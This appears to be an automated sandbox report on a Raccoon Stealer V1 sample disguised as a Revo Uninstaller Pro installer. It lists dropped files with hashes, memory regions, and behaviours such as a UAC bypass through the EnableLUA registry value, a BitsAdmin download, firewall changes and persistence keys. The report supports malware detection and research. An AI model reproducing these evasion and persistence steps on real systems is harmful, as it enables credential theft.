C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 3bf3cf2a1f9dfa39053a2e52efd53d4c
SHA1 efe9fa8ceae3f0f9b8d2d5c6eed17b78ccfd6ed9
SHA256 5a9671e65d4f22e2b592c14b6b18c08a88579363fc34dd0a7af952fa515287c1
SHA512 9ed2515f428ac04f30098038dc73bb9f6eab5cb222408990652ccb4ba6c77fb05223dc6c01b200033279d043838562d05b4c6511975d878f57112c723107022e

C:\Users\Admin\AppData\Local\VS Revo Group\Revo Uninstaller Pro\data\cachedata.dat

MD5 d1d1e40ea4d3ed2a8d5def030a67e025
SHA1 0ec1c6fd519d9cd0d89b0b0d86b8b74c356fbe3c
SHA256 42d33b63bce3350ade857c571d281e013c2b2b28d42f7ddf509d57c596ef0088
SHA512 94c27ba0d16e653a25c8e1c488a1d35a020b4b932d4c8953a0ecce6ceba5c153718a4eb46cbfca3169a008c0387b16f6b02d8806d4711d9d6bb3ad015ee8bd32

memory/3996-596-0x0000000006580000-0x00000000065CC000-memory.dmp

memory/3996-598-0x00000000747B0000-0x00000000747FC000-memory.dmp

memory/3996-608-0x0000000007290000-0x0000000007333000-memory.dmp

memory/3996-609-0x0000000007540000-0x0000000007551000-memory.dmp

memory/3996-610-0x0000000007580000-0x0000000007594000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e981a9b06aab254a64a5c2b07ee4c188
SHA1 e87ef6195e019ea175c3be781597a2972abab9d2
SHA256 82ba303d4ad497e690525fd2bb40ceafea797dc73fdee4820df6860f711c392c
SHA512 d0aca64c2f61cb941103cd1fbf1d4732b9135f9657c601210bb413b9c7286b4d1a253bfbd277c066500a365111367ade6b830ae0d4e7e7721efa98e5b7c65ecb

memory/4692-622-0x00000000747B0000-0x00000000747FC000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0dd66ce57443547d10c5f39ea090cf9d
SHA1 9c3c27cf8c3a8b4d6dc6666e746a0b65df4ed270
SHA256 b4fe650da01824398666a7dbe6bc862f1580369035a274b1ed6e0842d9d82054
SHA512 f552d53bb3e0d56da03a4965a7646a9b02ba9625411058cd67e20e62d9a4ef5ce9492f82e365e79de768e5ebedc5b565c34943efb03a10726ef5108ad69bc356

C:\ProgramData\uzlyLtM20yixSdV\main.bat

MD5 1376349b5831fe5760106870cd5bad6d
SHA1 cf6ff2d17e597893a61fedfd4fe90748ab2349e1
SHA256 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872
SHA512 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat

MD5 308ba58a50ffa9eabd31fdba79af6dd1
SHA1 29c09164facb6419f9d7f9e103f7e13bed4743a1
SHA256 0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512 674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

C:\ProgramData\uzlyLtM20yixSdV\file.bin

MD5 3ba604f3bc038fae6d7d70df18a95e8d
SHA1 f8553490c0063dba7d0e69b9e688d9abfec98314
SHA256 5077f9091c91a13eb822227b0a4e9a2f277542eec22910f794a44606fea16af5
SHA512 3144a0fb0ffc02e2cf35bffad36b42a76c6f7edd3089eeac884bb742278a68245143da981d54b9e0c026778bdf9ca38d19ea69c09e206e86defbd17427d1f642

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

C:\ProgramData\uzlyLtM20yixSdV\7z.dll

MD5 72491c7b87a7c2dd350b727444f13bb4
SHA1 1e9338d56db7ded386878eab7bb44b8934ab1bc7
SHA256 34ad9bb80fe8bf28171e671228eb5b64a55caa388c31cb8c0df77c0136735891
SHA512 583d0859d29145dfc48287c5a1b459e5db4e939624bd549ff02c61eae8a0f31fc96a509f3e146200cdd4c93b154123e5adfbfe01f7d172db33968155189b5511

C:\ProgramData\uzlyLtM20yixSdV\extracted\file_2.zip

MD5 b935bb028c9e072364d33b5e482b93c9
SHA1 63a89514cfd0a64fc7a1fbcd5bd91f0c350a212b
SHA256 5d55c036145879b4e92a9bd1862ff15c83954469bf96ce7cc8afbd6229d21845
SHA512 a41c488f634d117dcee8aaf5de8bbf9463ae39be1b85aa12355cbec9f275085c44c3ed654e214fbbde8a51c260627c105b1902aebb66e0129f3c11d699de53bc

C:\ProgramData\uzlyLtM20yixSdV\extracted\file_1.zip

MD5 c28ab5e6ae8588e03b92c24b14d12fef
SHA1 801c88fb58288fa2d54cf7584a089d6c50c02bb8
SHA256 ec59673a06768a14aed715995de14d34af211af5a4534059b5e22ab314a447a2
SHA512 a3f51f254166caba5664d5aca331142d481a60c803de8d69d5d278b1c74bcf2b312b07fd1e46e380ff3954f4e104674081fe3ceaa782b178adfab9226fe83442

C:\ProgramData\uzlyLtM20yixSdV\extracted\111.exe

MD5 618155a1c0479bc80c4bd28b7af93162
SHA1 542bf77b03bbdc5cc5caf0582b39cdc185e686f6
SHA256 ea712e9759d73168f605f8a55771d4aef62b0bef4b45cb8fd68ed11ea11c2fb4
SHA512 b870452ce96985e431789c2497f4fa46194ce1bf56463e1dc99b98513236b8b01228ec08c734a6c6af739ee00cb715a6cd8a62382febab4678a1055c34d5a461

C:\ProgramData\uzlyLtM20yixSdV\extracted\ANTIAV~1.DAT

MD5 3b9f43ca28acf55c64c9aa1ceb46c2d7
SHA1 7e30f2fde7a55b2023b03231993d66ea48513083
SHA256 ef08bdd7b11c188b1c0d0138dc9030fd3a2923512f983623bbdd34e55d95e50f
SHA512 58dece7172478fc948020de1dd67939331f0db1191b2583fa421406ba8d5d5a1907e2989447813ca1f0fdc0b9248e8bdb31db241f78e2b3f12d64f5c49f7d0a2

memory/4612-670-0x00000000008A0000-0x00000000009CE000-memory.dmp

memory/4612-671-0x0000000005280000-0x0000000005312000-memory.dmp

memory/4612-672-0x00000000053C0000-0x000000000545C000-memory.dmp

memory/4612-673-0x0000000005360000-0x000000000536A000-memory.dmp

memory/4612-674-0x0000000005800000-0x000000000581A000-memory.dmp

memory/4612-675-0x0000000007060000-0x0000000007150000-memory.dmp

memory/4612-676-0x0000000009740000-0x00000000097D8000-memory.dmp

memory/2752-679-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2752-681-0x0000000000400000-0x0000000000495000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-02 14:53

Reported

2024-10-02 14:55

Platform

win7-20240903-en

Max time kernel

145s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

Signatures

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\DRIVERS\SET2839.tmp C:\Windows\system32\rundll32.exe N/A
File created C:\Windows\system32\DRIVERS\SET2839.tmp C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\system32\DRIVERS\revoflt.sys C:\Windows\system32\rundll32.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Control Panel\International\Geo\Nation C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
N/A N/A C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\ProgramData\uzlyLtM20yixSdV\7z.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" C:\Windows\system32\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" C:\Windows\system32\rundll32.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2228 set thread context of 2988 N/A C:\ProgramData\uzlyLtM20yixSdV\111.exe C:\ProgramData\uzlyLtM20yixSdV\111.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-R3G4K.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CCP1.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P42QS.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-EPSJK.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P16HQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8J9A4.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-LM2NR.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-H28K7.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SABMQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-9JREG.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-O1JAE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5JKK.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1FKA5.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DJPHA.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-4N1NQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File created C:\Program Files (x86)\is-U6KOT.tmp C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CRER1.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-ISCMV.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-55INN.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9P2QL.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-931CM.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1RODL.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JFCQE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3TS51.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6UR6Q.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q8BBP.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-39OPA.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-3JF08.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-8495I.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-JTHFQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-28FML.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-9IIPE.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-RFR70.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GSVS2.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-6EHPV.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQB8P.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PVVH9.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-59SL6.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T4M4R.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-RJHJR.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-J94CH.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8LUA5.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-BI39F.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RO2T.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0F60D.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4R7ND.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CV8TO.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M9TL8.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-78MGP.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-Q4T3N.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-S2T3L.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DT655.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-AD34U.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L6J3P.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11GRQ.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File created C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HA11U.tmp C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A
File opened for modification C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll C:\Users\Admin\AppData\Local\Temp\is-2LT8K.tmp\Revo Uninstaller Pro 4.2.3.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SetupCache\v4.7.03062\DisplayIcon.ico C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\rundll32.exe N/A
File opened for modification C:\Windows\Installer\{AC76BA86-7AD7-1033-7B44-A90000000001}\SC_Reader.exe C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-BV814.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\uzlyLtM20yixSdV\111.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mode.com N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
